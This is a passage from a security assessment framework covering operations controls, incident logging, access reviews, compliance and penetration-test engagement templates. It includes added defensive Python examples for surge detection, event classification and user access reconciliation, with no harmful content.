3.3.5.5 SECURITY COMPLIANCE MANAGER
The Security Compliance Manager’s role is responsible for ensuring compliance with the Information Security Policies, Procedures and associated Standards, Guidelines and MBS by all personnel of the enterprise. This is one of the most critical roles in the Security Organization and Management process of an enterprise’s security posture. The Security Compliance Manager’s responsibilities will include the following:
• Performing periodic security reviews and assessments of the technology infrastructure of the company
• Researching and recommending best practices of Information Security management and implementation within the Enterprise
• Being a proactive catalyst for the identification and management of Information Security within the enterprise
3.3.6 Information Security Co-ordination
The management of each and every business unit of the enterprise should be responsible for assisting the CISO in implementing and maintaining Information Security within the enterprise. The coordination efforts could include the following:
• Identifying Information Security related roles and responsibilities across the different departments
• Facilitating the implementation of processes related to Information Security
• Providing feedback on enterprise-wide security initiatives
• Assisting in the assessment of the adequacy of enterprise-wide security initiatives
• Participating in the review of Information Security incidents
• Facilitating the implementation of Information Security initiatives where relevant
• Promoting support for Information Security
3.3.7 Personnel Security
Background Checks
On-boarding - Employees and Contractors
Off-boarding
Security in Job Responsibilities
Security Training and Awareness
Disciplinary Process
Security Incident Identification and Reporting
3.3.8 Security of Third Party
3.3.9 Outsourcing
3.4 ENTERPRISE SECURITY AND CONTROLS ASSESSMENT
3.4.1 Physical and Environmental Security
Facilities Security
Designated Secure Areas
Equipment Security
Location of IPF
Fire
Heating, Ventilation and Air-conditioning
3.4.2 Technical Controls Assessment
3.4.2.1 TECHNICAL CONTROLS ASSESSMENT METHODOLOGY
3.4.2.2 DATABASE SECURITY
3.4.2.3 HOST SECURITY
3.4.2.4 APPLICATION SECURITY AND CONTROLS
3.4.2.5 NETWORK SECURITY
3.4.3 Secure Application Development Process
3.4.4 Security Awareness
Review of Security Awareness Program (SAP)
Interviews
Observation
Structured walk through
Social Engineering
3.5 REVIEW OF ENTERPRISE SECURITY OPERATIONS MANAGEMENT
The implementation of a comprehensive Information Security management framework includes both technical and manual security processes that need to be synchronized with each other to ensure completeness of the management of security. Operations Management includes the management of the IT administration and service delivery processes of the enterprise. A review of the IT operations in any security framework assessment is essential to ensure that the security operational processes that support the information security management of the enterprise are appropriately implemented and adhered to, so that such controls and security measures are effectively meeting the enterprise’s information risk management objectives.
3.5.1 Capacity Management
Capacity Management relates to the process of management of the IT infrastructure capacity to ensure continuous availability of the technology infrastructure of the enterprise. This would typically involve the management of the capacity of hardware and software components to ensure that there is no disruption to the activities of the business caused by any technological capacity restrictions. Such activities would include:
• Review and ensure that appropriate processes exist for planning and acquiring new systems, system upgrades or new versions of systems, considering the capacity requirements of the enterprise
• Assess whether capacity usage is constantly monitored in order to ensure availability of IT services and to detect any unauthorized activities in the IT environment. This is particularly important considering the risks of DoS attacks or similar attacks being executed against the enterprise’s infrastructure.
• Ensure that capacity monitoring and planning considers all the components of the technology infrastructure of the enterprise, such as hardware, software and networking.
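The second activity above asks that capacity usage be monitored continuously so that a DoS-style surge is noticed, not only planned-for growth. The following is an added example written for this page (it is not part of the ISSAF and not the framework's own tooling): it runs a rolling-median check over a constructed series of per-minute connection counts and flags minutes whose count jumps far above the recent baseline, and separately lists the minutes that consumed most of an assumed capacity limit. The sample series, the window size, the factor and the capacity figure are assumptions chosen for illustration.

```python
"""Capacity monitoring: flag per-minute counts that spike well above the
recent baseline, the kind of surge a DoS attempt or a runaway client produces.
Added example; the data and thresholds are constructed for illustration."""
from statistics import median
from typing import List, Tuple

# Constructed sample: (minute, inbound connections in that minute). Minutes
# 14-16 carry a surge roughly 25x the normal level; the rest is steady state.
SAMPLES: List[Tuple[int, int]] = [
    (0, 98), (1, 105), (2, 97), (3, 110), (4, 102), (5, 99), (6, 104),
    (7, 101), (8, 96), (9, 108), (10, 103), (11, 100), (12, 99), (13, 106),
    (14, 2400), (15, 2650), (16, 2550), (17, 120), (18, 101), (19, 97),
]


def detect_surges(samples: List[Tuple[int, int]], window: int = 10,
                  factor: float = 5.0) -> List[Tuple[int, int, float]]:
    """Return (minute, count, baseline) for every sample whose count exceeds
    `factor` times the median of the preceding `window` samples.

    A median baseline is used rather than a mean so that the first minutes of
    a surge do not drag the baseline up and hide the minutes that follow.
    The first `window` samples have no baseline and are never flagged.
    """
    counts = [c for _, c in samples]
    alerts: List[Tuple[int, int, float]] = []
    for i in range(window, len(samples)):
        baseline = float(median(counts[i - window:i]))
        if counts[i] > factor * baseline:
            alerts.append((samples[i][0], counts[i], baseline))
    return alerts


def headroom_exhausted(samples: List[Tuple[int, int]], capacity: int,
                       utilisation: float = 0.8) -> List[int]:
    """Capacity-planning view of the same data: the minutes in which the
    count used more than `utilisation` of the configured `capacity`
    (an assumed limit for the component being monitored)."""
    return [m for m, c in samples if c > utilisation * capacity]


if __name__ == "__main__":
    for minute, count, base in detect_surges(SAMPLES):
        print(f"minute {minute}: {count} connections vs baseline {base:.0f}")
    print("over 80% of capacity:", headroom_exhausted(SAMPLES, capacity=3000))
```

In a real deployment the series would come from the enterprise's monitoring platform and the two checks would feed the incident process as operational events, with the surge alerts also assessed for security implications as the Operation Event Management section below requires.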
3.5.2 Vulnerability Management
Vulnerability Management relates to the process of management of vulnerabilities of
various applications, databases and systems software in use within an enterprise. The
need for a structured and managed Vulnerability Management process stems from the
technology infrastructure implemented within an enterprise and security or control lapses
inherent within such software. The process of vulnerability management would involve
the identification, monitoring and patch management of vulnerabilities of the specific
technologies in use. The typical activities of the
3.5.3 Release Management
Release Management comprises the management of changes to the information technology environment of the enterprise. This would include the management of changes in respect of the following:
3.5.3.1 PATCH MANAGEMENT
• Patches are obtained from authorized sources only
• Patches are appropriately tested in a test environment prior to application to the production environment
• Patches are applied only on a need basis and not solely due to a release by the vendor
• Patches are adequately monitored
3.5.3.2 CONFIGURATION MANAGEMENT
Configuration management relates to the process of management of:
• The configurations of all hardware devices/components
• Operating systems and application software, firmware components, physical and logical network addresses and connecting circuit numbers of Internet connectivity and the network architecture, which should be adequately documented and maintained
3.5.3.3 CHANGE MANAGEMENT
3.5.4 Enterprise Incident Management
Enterprise Incident Management relates to the identification, investigation and resolution of security incidents related to the Information Systems Infrastructure of an enterprise. The philosophy of incident management requires that all incidents, irrespective of their criticality, are logged and investigated to ensure that they do not pose a security concern/risk to the enterprise. A review of the Enterprise Incident Management Processes includes:
• Ensure that the enterprise has adequate infrastructure and processes to identify and record all systems events
• Ensure events are logged, investigated, escalated and resolved in accordance with the Information Security Policies of the enterprise
• Event Logs include the following at a minimum:
  - Security Device Logs (Firewall, IDS, IPS etc.)
  - Network Device Logs
  - Server Logs (Applications, Databases, OS, Email, Web server, Proxy Server, SMTP Servers)
  - Secure Transmission and Storage of Event Logs
• Ensure that monitoring procedures provide for appropriate escalation procedures
• Ensure monitoring of logs on a daily, weekly or monthly basis as is applicable
• Ensure events are appropriately classified as Security Incidents (unauthorised access attempts at server and client levels, IDS event logs of attempted connections) or Operational Events (abnormal Information Systems events such as abnormal termination, errors, failures, connectivity issues, etc.)
• Ensure the process provides for taking necessary actions to prevent recurrence of security incidents through appropriate measures
• Security Incidents are routed to the Security Incident Management Process in 6.5.4.3
• Operational Events are routed to the Operations Events Management Process in 6.5.4.4
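The classification and routing bullets above describe a decision the incident process has to make for every record in the central events database: is this a Security Incident for the Security Incident Management process, or an Operational Event for Operations Event Management? As an added example (written for this page, not part of the ISSAF), the Python below applies that split to a constructed set of records in an assumed "source|message" format, using the page's own indicators (unauthorised access attempts and IDS connection attempts on one side; abnormal termination, errors, failures and connectivity issues on the other), and adds a chained SHA-256 digest over the stored records so a reviewer can detect tampering with the log store, which the "Secure Transmission and Storage of Event Logs" item calls for. The record format, the patterns and the sample lines are assumptions.

```python
"""Route central event-database records to Security Incident Management or
Operations Event Management, and keep a tamper-evident digest chain over the
stored records. Added example; records and patterns are constructed."""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample records in an assumed "source|message" form, standing in
# for the central events database fed by security devices, network devices
# and servers. None of these are real log lines.
SAMPLE_EVENTS: List[str] = [
    "firewall|DENY tcp 203.0.113.7:51234 -> 192.0.2.10:22",
    "ids|ALERT attempted connection 198.51.100.9 -> 192.0.2.10:3389 (sig rdp-probe)",
    "server|sshd: Failed password for invalid user admin from 203.0.113.7 port 51234",
    "application|ERROR order-service terminated abnormally (exit code 137)",
    "network|LINK DOWN interface Gi0/1 on core-sw-1",
    "database|WARNING connection pool exhausted, 40 clients waiting",
    "server|sshd: Accepted password for bob from 192.0.2.50 port 40112",
]

# Indicators taken from the page's own classification. Illustrative, not a
# complete taxonomy: a real deployment would derive these from the
# definitions document the Security Incident Management section requires.
SECURITY_RE = re.compile(
    r"failed password|invalid user|\bdeny\b|unauthori[sz]ed|attempted connection|\balert\b",
    re.IGNORECASE,
)
OPERATIONAL_RE = re.compile(
    r"terminated abnormally|\berror\b|\bfailure\b|link down|connectivity|\bwarning\b",
    re.IGNORECASE,
)
# Every IDS/IPS event log is treated as a security incident, per the page.
SECURITY_SOURCES = {"ids", "ips"}


@dataclass
class Event:
    source: str
    message: str
    category: str  # "security_incident" | "operational_event" | "normal"


def classify(record: str) -> Event:
    """Classify one record. Security indicators are checked first so that an
    error message caused by an attack is not filed as a routine fault."""
    source, _, message = record.partition("|")
    source = source.strip().lower()
    if source in SECURITY_SOURCES or SECURITY_RE.search(message):
        category = "security_incident"
    elif OPERATIONAL_RE.search(message):
        category = "operational_event"
    else:
        category = "normal"
    return Event(source, message.strip(), category)


def route(records: List[str]) -> Dict[str, List[Event]]:
    """Split records into the queues the page routes them to: the Security
    Incident Management process, the Operations Event Management process,
    or normal activity that is retained but needs no response."""
    queues: Dict[str, List[Event]] = {
        "security_incident": [], "operational_event": [], "normal": []}
    for record in records:
        event = classify(record)
        queues[event.category].append(event)
    return queues


def integrity_chain(records: List[str]) -> List[str]:
    """Chained SHA-256 over stored records: each digest covers the previous
    digest plus the record, so altering or removing a record changes every
    digest from that point on. A reviewer who keeps the last digest offline
    can detect later tampering with the central store."""
    previous = "0" * 64
    chain: List[str] = []
    for record in records:
        previous = hashlib.sha256((previous + record).encode("utf-8")).hexdigest()
        chain.append(previous)
    return chain


if __name__ == "__main__":
    for name, events in route(SAMPLE_EVENTS).items():
        print(f"{name}: {len(events)}")
        for event in events:
            print(f"  [{event.source}] {event.message}")
    print("chain head:", integrity_chain(SAMPLE_EVENTS)[-1])
```

The order of the checks in classify is the point worth noting: a record that matches both sets of indicators is routed as a security incident, which is the conservative choice the page's "all incidents irrespective of their criticality are logged and investigated" philosophy implies.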
3.5.4.1 LOGGING
Logging is one of the most important activities related to the process of monitoring Information Systems Security within an enterprise. This would involve logging of all occurrences of events (whether authorized or unauthorized, normal or abnormal) within the Information Systems of an enterprise. These event logs would then form the basis for review and assessment for identification of events that have a security implication for the enterprise. The review of logging must ensure that the following activities are conducted at a minimum:
• Review the incident management procedures of the enterprise and ensure that all technology events are appropriately recorded in a central database, either using automated solutions such as Enterprise Management Systems or through a helpdesk function.
• Ensure that the incident management procedures require the central events database to be reviewed to distinguish normal operational events from potential security events. Such reviews should ensure normal operational events are routed to the IT operations staff for resolution, whilst potential security events are routed to the Chief Information Security Officer and his team for investigation and resolution.
• Assess whether the process for incident reporting ensures that all system faults or suspected system faults are reported and logged.
• Ensure Helpdesk logs are periodically reviewed to ensure that all faults reported have been satisfactorily resolved and the Helpdesk call closed.
• Ensure fault resolutions are reviewed to ensure that Information Security and Controls have not been compromised in the process of implementing such resolutions.
• Review that audit logs have been activated on critical technology components such as servers, applications, databases and the network. Ensure that these logs produce meaningful information that can be used in investigating security events.
3.5.4.2 MONITORING
Monitoring is the process of continuous review of the event logs of various technology components of the enterprise. This would involve a review of the audit trails, event logs, incident logs and helpdesk logs, amongst other logs, as applicable to the enterprise. Depending on the implementation of the logging process (i.e. centralized or decentralized) this activity can be performed either by one or many individuals across the enterprise. The most significant component of the process of monitoring is the responsibility for performance of this activity. The process would necessarily require the involvement of the Information Security Officer and the Compliance Manager to ensure that security incidents are identified and appropriate action is initiated to resolve them.
3.5.4.3 SECURITY INCIDENT MANAGEMENT
The Security Incident Management process would stem from the logging and monitoring processes mentioned above to ensure that identified security incidents are managed in accordance with the risks that such incidents pose to the enterprise. The process of Security Incident Management must be performed by the Information Security Officer (ISO) and should at a minimum involve the following:
• Definition of security events / incidents: this would involve the formalization of a definitions document that identifies all event / incident types that have a security implication and are considered critical to the enterprise
• Allocation of responsibilities for logging of events or incidents reported. This could be a part of the helpdesk functionality or, in larger enterprises, through a security helpdesk function that is specifically constituted for handling security events or incidents
• Constitution of a security response team: this comprises a team of security personnel who would respond to a report of a security event or incident
• Classification of security events or incidents: this involves the classification of security events in order of their impact on the organization
• Risk Assessment and Incident Response: this is a process of security incident management wherein the security response team assesses the risks that an identified security incident poses to the Information Security of the enterprise. Depending on the criticality of the risk identified, the security and controls to be implemented are determined. In the event the incident requires further investigation, processes such as Computer Forensics and Investigations are applied.
3.5.4.4 OPERATION EVENT MANAGEMENT
Operations Event Management relates to the process of responding to events that are operational in nature. Such events stem from the IT infrastructure and technology being used in the enterprise and may comprise routine IT operations events such as abnormal performance, terminations and poor response, amongst many others.
However, it is extremely important that the operations events are also assessed for security implications, so as to ensure that any operations events that may arise from security violations are identified and remedied with a response equivalent to that for a security incident. Furthermore, operational event remediation may also at times introduce security flaws and vulnerabilities, which need to be prevented at the time of remediation itself so as to reduce the probability of such vulnerabilities being exploited against the security interests of the enterprise.
For evaluation of the security implications, if any, of an operational event, the process of operations event management must be routed to the Risk Assessment in Security Incident Management (refer 11.1.4.3 Security Incident Management).
3.5.5 User Access Management
User Access Management relates to the process of managing user access to the Information Systems of the enterprise. This would include the management of user access for the following:
• New User Creation
• Existing User Access Modifications
• User Access Profiles creation and modifications
• User Access Termination
A review of the user access management process would essentially comprise the following:
• Review of User Access Policies
• Review of User Access Management roles and responsibilities
• Review of User Access creation, modification and termination for the following:
  - Business Applications such as ERP
  - Enterprise Applications such as Email
  - Access to Local Area Network
• Review of the process for periodic reviews of user access, to ensure that transitional processes of the organization that impact job responsibilities do not result in users having unauthorized access
• Review the process and results of User Access Log monitoring processes, to ensure that unauthorized activities have been appropriately detected and remedied
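The periodic user access review described in the last two bullets is a reconciliation: the access each user actually holds is compared against the HR record of who is still employed and in what role, and anything outside that is a finding. As an added example (written for this page, not part of the ISSAF), the Python below runs that reconciliation over constructed data: an HR roster, a role-to-entitlement baseline standing in for the enterprise's User Access Profiles, and an entitlement export from the ERP, email and LAN systems the page names. The roster, profiles and entitlements are assumptions; the three finding types (a terminated user still provisioned, an account with no HR record, and access left over from a previous role) are the conditions the review is meant to catch.

```python
"""Periodic user access review: reconcile actual entitlements against the HR
roster and the role baseline to find stale, orphaned and excess access.
Added example; all data below is constructed."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# HR roster (constructed): user -> (employment status, current role).
HR_ROSTER: Dict[str, Tuple[str, str]] = {
    "alice": ("active", "finance_clerk"),
    "bob": ("active", "sales_rep"),        # transferred from finance to sales
    "carol": ("terminated", "sysadmin"),   # left last month
    "dave": ("active", "sysadmin"),
}

# Role baseline (constructed): the User Access Profile each role is meant to
# hold, as (system, right) pairs across ERP, email and LAN access.
ROLE_PROFILES: Dict[str, Set[Tuple[str, str]]] = {
    "finance_clerk": {("erp", "ap_entry"), ("email", "mailbox"), ("lan", "vpn")},
    "sales_rep": {("erp", "crm_read"), ("email", "mailbox"), ("lan", "vpn")},
    "sysadmin": {("erp", "admin"), ("email", "admin"), ("lan", "admin")},
}

# Entitlement export from the systems (constructed): (user, system, right).
ENTITLEMENTS: List[Tuple[str, str, str]] = [
    ("alice", "erp", "ap_entry"), ("alice", "email", "mailbox"), ("alice", "lan", "vpn"),
    ("bob", "erp", "ap_entry"),  # not removed when bob moved to sales
    ("bob", "erp", "crm_read"), ("bob", "email", "mailbox"), ("bob", "lan", "vpn"),
    ("carol", "erp", "admin"), ("carol", "lan", "admin"),  # termination not processed
    ("dave", "erp", "admin"), ("dave", "email", "admin"), ("dave", "lan", "admin"),
    ("svc_backup", "lan", "admin"),  # account with no HR record
]


@dataclass(frozen=True)
class Finding:
    user: str
    system: str
    right: str
    reason: str  # "terminated_user" | "no_hr_record" | "beyond_role_profile"


def review_access(roster: Dict[str, Tuple[str, str]],
                  profiles: Dict[str, Set[Tuple[str, str]]],
                  entitlements: List[Tuple[str, str, str]]) -> List[Finding]:
    """Walk every granted entitlement and flag the ones the review should
    question. The order of checks matters: an unknown account is reported
    as such, a leaver's access is reported whatever their old role allowed,
    and only an active user is measured against the role baseline."""
    findings: List[Finding] = []
    for user, system, right in entitlements:
        if user not in roster:
            findings.append(Finding(user, system, right, "no_hr_record"))
            continue
        status, role = roster[user]
        if status != "active":
            findings.append(Finding(user, system, right, "terminated_user"))
        elif (system, right) not in profiles.get(role, set()):
            findings.append(Finding(user, system, right, "beyond_role_profile"))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per reason, the figure a review report leads with."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding.reason] = counts.get(finding.reason, 0) + 1
    return counts


if __name__ == "__main__":
    results = review_access(HR_ROSTER, ROLE_PROFILES, ENTITLEMENTS)
    for finding in results:
        print(f"{finding.reason:20} {finding.user:12} {finding.system}/{finding.right}")
    print(summarize(results))
```

Each finding carries the exact (user, system, right) triple, which is what the owning system administrator needs in order to revoke it and what the reviewer needs in order to confirm at the next cycle that the revocation happened.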
3.5.6 Certification and Accreditation
Information Systems Security is a rapidly transforming environment wherein new vulnerabilities and risks are introduced each day, resulting in the pressing need for constant monitoring and assessments to ensure that the security management infrastructure of the enterprise is awake to this challenge and can respond in a manner that appropriately addresses the technology risks that impact the enterprise.
Given the rapid advancements in technology, enterprises find it difficult to maintain adequate technological skills or to sustain continuous education to develop the expertise internally. As a result, to maintain its information security capabilities the enterprise often relies on external parties or dedicated internal groups for the periodic assessment of its Information Systems Security. Such reviews would typically involve the following:
• Internal IT Audit Review, comprising reviews of specific areas of IT security performed by internal resources
• Internal Security Assessment, comprising technology-specific reviews performed by specialist IT security personnel
• Third party Information Security Assurance Reviews, comprising security assessments performed by third party contractors in areas that require advanced technology and security specializations
Accreditation involves the process of benchmarking and reviewing the IT security implementation within an enterprise against the ISSAF.
3.6 BUSINESS CONTINUITY AND DISASTER RECOVERY PLANNING ASSESSMENT
3.6.1 Risk Assessment
The risk assessment process for BC and DRP stems from the Risk Assessment performed in 3.1 Identify Pertinent (Gross) Risk. Risks considered for the purposes of BC and DRP will include all information asset categories that have availability as a critical attribute of that asset.
3.6.2 Threat Identification & Assessment
Identify threats that impact the availability of information assets for the purposes of
business operations.
3.6.3 Business Impact Analysis
3.6.4 Review of BC/DR Strategy
3.6.5 Review of BC/DR Plan
3.6.6 BC/DR Testing
3.6.7 Review of BC/DR Maintenance
3.7 REVIEW OF LEGAL AND REGULATORY COMPLIANCE
Legal and regulatory compliance requirements are currently among the most discussed
topics within enterprise management. This stems from the introduction of Sarbanes-Oxley
(officially the Public Company Accounting Reform and Investor Protection Act, enacted in
the United States in 2002), the Data Protection Act (UK), the Singapore Evidence Act
and the Freedom of Information Act (India), amongst many other acts.
All these acts have a significant impact on the technology infrastructure and the
information systems of the enterprise, and so require the enterprise to comply with
technology-related laws. For a long time the legal and regulatory framework remained
obscure, so IS security implementations were mostly shaped by ethics and a set of
commonly used best practices.
Recent developments in the legal structure of some countries have raised concerns
about enterprises’ IS security and have pushed management to reconsider its position
on IS security, on the necessity of performing IS security assessments, and on the
comprehensive implementation of appropriate security solutions.
Although the ISSAF does not cover the technical requirements of each and every law
in existence, the framework does acknowledge and detail the need to assess whether
the enterprise has taken reasonable steps, or has adequate controls in place, to ensure
that all its legal and regulatory requirements are identified and met.
3.7.1 Identify Regulatory Compliance Requirement
During an information security assessment, the legal and regulatory requirements that
the enterprise needs to adhere to must be identified. Generally, reliance can be placed
on any control process within the enterprise that enables the identification of such
requirements. For example, if the enterprise has a compliance department consisting of
legal advisors whose main responsibility is to identify such requirements, reliance can be
placed upon their work after assessing the controls that exist within their processes.
Documentary evidence of the work performed to verify compliance with laws should be
made available.
It is nevertheless recommended that the personnel responsible for performing the
information security assessment also have an understanding of the various laws that
affect information security and the technology infrastructure of the enterprise.
3.7.2 Review Compliance against Regulatory Requirement
While performing the information security assessment, compliance with the specific legal
and regulatory requirements should be verified. Additionally, reviewing the
documentation and reports of any independent third-party legal and regulatory
compliance review can be beneficial.
3.7.3 Certification and Accreditation
Any certification and/or accreditation that the enterprise has obtained provides
supporting evidence of its compliance with the legal and regulatory requirements that
the certification covers.
3.8 RESIDUAL RISK MANAGEMENT
Based on the risk assessment (refer to section 3.1 Identify Pertinent (Gross) Risk), we
establish the risks that the business has chosen to manage through the implementation
of information security management, that is:
• Risks not covered by the information security infrastructure of the business
• Risks that the business has agreed to accept in the light of:
o A cost-benefit analysis (where the cost of the control exceeds the risk impact to the
business)
o Periodic assessment of the residual risk
4 ENGAGEMENT MANAGEMENT
A project is a grouping of activities that, taken together, achieves an objective or goal.
A project always has a recognizable beginning and end. The topics below give an
overview of how project management can be applied to security assessment projects.
A security testing job entails numerous tasks and involves several parties. Such a job
requires project planning from the outset and management activity throughout the life of
the project. This section describes the project management aspects of a security
assessment project.
The following guidelines can be used directly to provide a project management plan to
the client.
4.1 PROJECT EXECUTIVE OVERVIEW
(Optional) The executive summary provides a summary of the project definition
document. In many cases, this is a PowerPoint presentation. If it is, then a reference to
the external document can be included here. This section contains high-level
explanation of the project objectives, scope, assumptions, risks, costs, timeline,
approach, and organization. (Remove this comment section from final document.)
Describe the background and context for the project and why it is being undertaken.
Speak to the business value of the work being performed. Put enough information here
so that the rest of the sections in the project definition make sense. (Remove this
comment section from final document.)
4.2 OBJECTIVE
Objectives are statements that describe what this project will achieve and deliver.
Objectives should be “SMART”: Specific, Measurable, Achievable, Realistic, and
Time-Based. To be specific and concrete, objectives should be deliverable-based. The
completion of an objective should be evident through the creation of one or more
deliverables. If the statement is at a high level and does not imply the creation of a
deliverable, it may be a goal instead. If the statement is too low-level and describes
features and functions, then it may be a requirement statement instead. (Remove this
comment section from final document.)
The XXX project will meet the following objectives:
• Objective #1
• Objective #2
• Objective #3
Expected Result[s]
Give a brief description of each deliverable. A sample deliverable report can also be
attached.
The XXX project will produce the following deliverables:
• Deliverable #1
• Deliverable #2
• Deliverable #3
4.3 METHODOLOGY
Give an overview of the methodology used for the security assessment project. The
phases involved in a typical security assessment project are:
•
Planning and Preparation
•
Assessment
•
Reporting
4.4 PROJECT SCOPE
In this section, you should clearly define the logical boundaries of your project. Scope
statements are used to define what is within the boundaries of the project and what is
outside those boundaries. Examples of areas that could be examined are data,
processes, applications, or business areas. The following types of information can be
helpful:
•
The types of deliverables that are in scope and out of scope (Business
Requirements, Current State Assessment)
•
The major life-cycle processes that are in scope and out of scope (analysis, design,
testing)
•
The types of data that are in scope and out of scope (financial, sales, employee)
•
The data sources (or databases) that are in scope and out of scope (Billing, General
Ledger, Payroll)
•
The organizations that are in scope and out of scope (Human Resources,
Manufacturing, vendors)
•
The major functionality that is in scope and out of scope (decision support, data
entry, management reporting)
(Remove this comment section from final document.)
The scope of this project includes and excludes the following items.
In scope:
•
Task One
•
Task Two
•
Task Three
•
Task Four
Out of scope:
•
Task Five
•
Task Six
•
Task Seven
•
Task Eight
4.5 PROJECT KICKOFF MEETING (INTERNAL)
When a project is won, the Project Manager shall call a project kickoff meeting. The
following points shall be discussed in this meeting:
• Quick look at lessons learned in previous projects
o Highlight challenges/problems and design a strategy to resolve them
•
Declare Single Point of Contact for Project
•
Form Project Team and divide their tasks
•
Set deadlines on divided tasks to members responsible for Project Execution
•
Process Administrative Tasks
o
Visa Processing (If required)
o
Travel Management
o
Check Passport status and Important papers with candidates
o
Check Emigration Check Not Required (ECNR) on passport of candidates
•
Availability of Tools (Commercial/Freeware)
•
Efficient delivery capabilities of promised tasks in proposal
•
Any help needed for delivery
o
Infrastructure for testing
o
Training
o
Backup infrastructure
•
Inform TIM about IP Addresses
•
Project manager or assigned team member shall give minutes of meetings to
everybody
4.6 COMMUNICATIONS PLAN
Name / Project Role | Numbers | Email
INSERT CONTACT LIST
Standard/Scheduled Communications
The Assessment Team Program/Project Manager will initiate the following project
meetings through the project life cycle:
On-site at –CUSTOMER NAME-:
•
Mid-Planning and End-of-Planning Meetings
•
Project Kick-Off Meeting
•
Progress Meetings (frequency and method to be determined by the CUSTOMER
NAME). A meeting agenda will be distributed to attendees prior to the meeting
and meeting minutes will be distributed after the meeting.
•
Project End (Debrief) Meeting
On a weekly basis, Assessment Project Management will provide status to all project
stakeholders via the CUSTOMER NAME project web site (to be developed). The Project
Manager will post all project-related documents developed during the week there each
Friday. The project web site is a valuable tool that archives all documents, making them
easily and readily available for baseline reviews.
It is imperative for all managers to be aware of issues that their teams are
managing / experiencing; therefore, all project communications will follow a
“chain of command” structure. Please refer to the Project Org Chart for
communication checkpoints.
4.7 PROJECT KICKOFF CALL WITH CLIENT
Points to discuss
• Explain your understanding of the client’s requirement
• Discuss dates of assessment, offshore/onsite
• Request the client to issue an invitation letter to the embassy in the names of the test
team members (if required)
• Inform the client of the source IP addresses used for the assessment
• Identify the access points and the number of devices that need to be tested
• Deliverables
o Executive Summary
o Vulnerability Summary
o Detailed test results with countermeasures to safeguard against the vulnerabilities
• Single point of contact at both ends
• Team introduction
• Project start and end dates
• Working days/hours
• Internet access during the onsite assessment
• Site location and contact numbers
• Confirm with the client that access to the services under test is open on their firewall
from the given source IP addresses, so that the assessment is not silently filtered
• Make sure the same access is permitted outbound through your own company/ISP
router and firewall
4.8 SAMPLE STATUS REPORT
From:
Subject: Status Report for
Period:
If appropriate, provide background information for this report. You may wish to include
the following information in your comments:
Origins of the project; business reason for its initiation; anticipated value to the customer;
and projected increase to revenue or decrease to cost.
Project scope and objective
Summary:
Total Hours Used:
Identify overall project status and provide a few key bullet points highlighting planned vs.
actual aspects of each relevant topic:
Project Status:
GREEN
YELLOW
RED
NOTE: Status Reports will be completed weekly. Do not be hesitant to provide a
yellow or red status; this is a tool to alert management to potential issues.
•
Green – Project is proceeding on plan with no major showstoppers.
•
Yellow – Project has tasks that “may” impact project completion.
•
Red – Major issues exist with required tasks that are needed to complete the
project. Management assistance is needed immediately.
Project Schedule
Indicate the current planned completion date for all major tasks & milestones through
completion of the project.
TASK/EVENT | PLANNED DATE
Major Accomplishments: (Any significant completed tasks)
Highlight major accomplishments achieved during the reported status period. Identify
focus of current project work and any additional information on completed tasks.
Outstanding Issues or delinquent items
Identify appropriate critical issues that threaten the success of this project. Provide
further information regarding background and action plans for addressing the issue.
ISSUE | ACTION PLAN
Next Steps/Upcoming Events - (planned tasks for the next reporting period)
4.9 ISSUE ESCALATION PLAN
An escalation chart for issues can be provided in this section. Escalation paths are
needed on both the client and the assessment organization sides. A flow chart is of
great help.
4.10 DEVELOP A PROJECT PLAN AND SEND IT TO CUSTOMER
It should include the following:
• The test cases that you are going to execute
• The time allotted to every test case
• Start and end date of the project
• Time of assessment
• Contacts for each team
4.11 SET MILESTONES AND TIMELINES
Define project milestones by task, stick to them and achieve them in the defined time.
Try to complete testing within office hours, when the client’s staff are available to restore
service quickly if any downtime occurs.
Sample five-week timeline:
Week 1 | Planning and Preparation; Information Gathering; Network Mapping
Week 2 | Vulnerability Identification
Week 3 | Vulnerability Identification (cont.)
Week 4 | Vulnerability Identification (cont.); Target Exploitation
Week 5 | Target Exploitation (cont.); Reporting
4.12 PROJECT SCHEDULE
The CUSTOMER NAME project will be driven by a project schedule chart. The master
schedule details all major phases and their associated sub-tasks. The master schedule
is detailed below.
<INSERT PROJECT SCHEDULE HERE>
4.13 DELIVERABLES PRODUCED
All projects have deliverables. In this section, describe the deliverables of the project.
Provide enough explanation and detail so that the reader will be able to understand what
is being produced. (Remove this comment section from final document.)
•
Deliverable 1: description
•
Deliverable 2: description
•
Deliverable 3: description
4.14 PROJECT ESTIMATED EFFORT/COST/DURATION (COST OPTIONAL)
The estimated effort hours and project costs may be depicted in many ways, including
cost by team member, cost by deliverable, cost by milestone, or cost by category
(internal labor, external labor, travel, training, supplies, etc.). Also include a chart
showing the project start date, major milestones, and end date. The deliverables
included in this milestone chart should all have been described in the scope section.
(Remove this comment section from final document.)
Milestone | Date completed | Deliverable(s) completed
Project planning | Mm/dd/yy | Project definition; Workplan
Milestone 1 | Mm/dd/yy | Deliverable 1; Deliverable 2
Milestone 2 | Mm/dd/yy | Deliverable 3
Milestone 3 | Mm/dd/yy | Deliverable 4
Milestone 4 | Mm/dd/yy | Deliverable 5
Project conclusion | Mm/dd/yy |
4.15 PROJECT ASSUMPTIONS
Project assumptions are circumstances and events that need to occur for the project to
be successful but are outside the total control of the project team. They are listed as
assumptions if there is a HIGH probability that they will in fact happen. The assumptions
provide a historical perspective when evaluating project performance and determining
justification for project-related decisions and direction. (Remove this comment section
from final document.)
In order to identify and estimate the required tasks and timing for the project, certain
assumptions and premises need to be made. Based on current knowledge, the project
assumptions are listed below. If an assumption is invalidated at a later date, the
activities and estimates in the project plan should be adjusted accordingly.
•
Assumption #1
•
Assumption #2
•
Assumption #3, etc
4.16 PROJECT RISKS
Project risks are circumstances or events that exist outside of the control of the project
team that will have an adverse impact on the project if they occur. (In other words,
whereas an issue is a current problem that must be dealt with, a risk is a potential future
problem that has not yet occurred.) All projects contain some risks. It may not be
possible to eliminate risks entirely, but they can be anticipated and managed, thereby
reducing the probability that they will occur.
Risks that have a high probability of occurring and have a high negative impact should
be listed below. Also consider those risks that have a medium probability of occurring.
For each risk listed, identify activities to perform to eliminate or mitigate the risk.
IDENTIFICATION: WBS # | Description of risk event
QUANTIFICATION: Probability (as a fraction of 1: Low 0-0.35, Medium 0.35-0.65,
High 0.65-1.0) | Consequences
MITIGATION: Solutions
4.17 PROJECT APPROACH
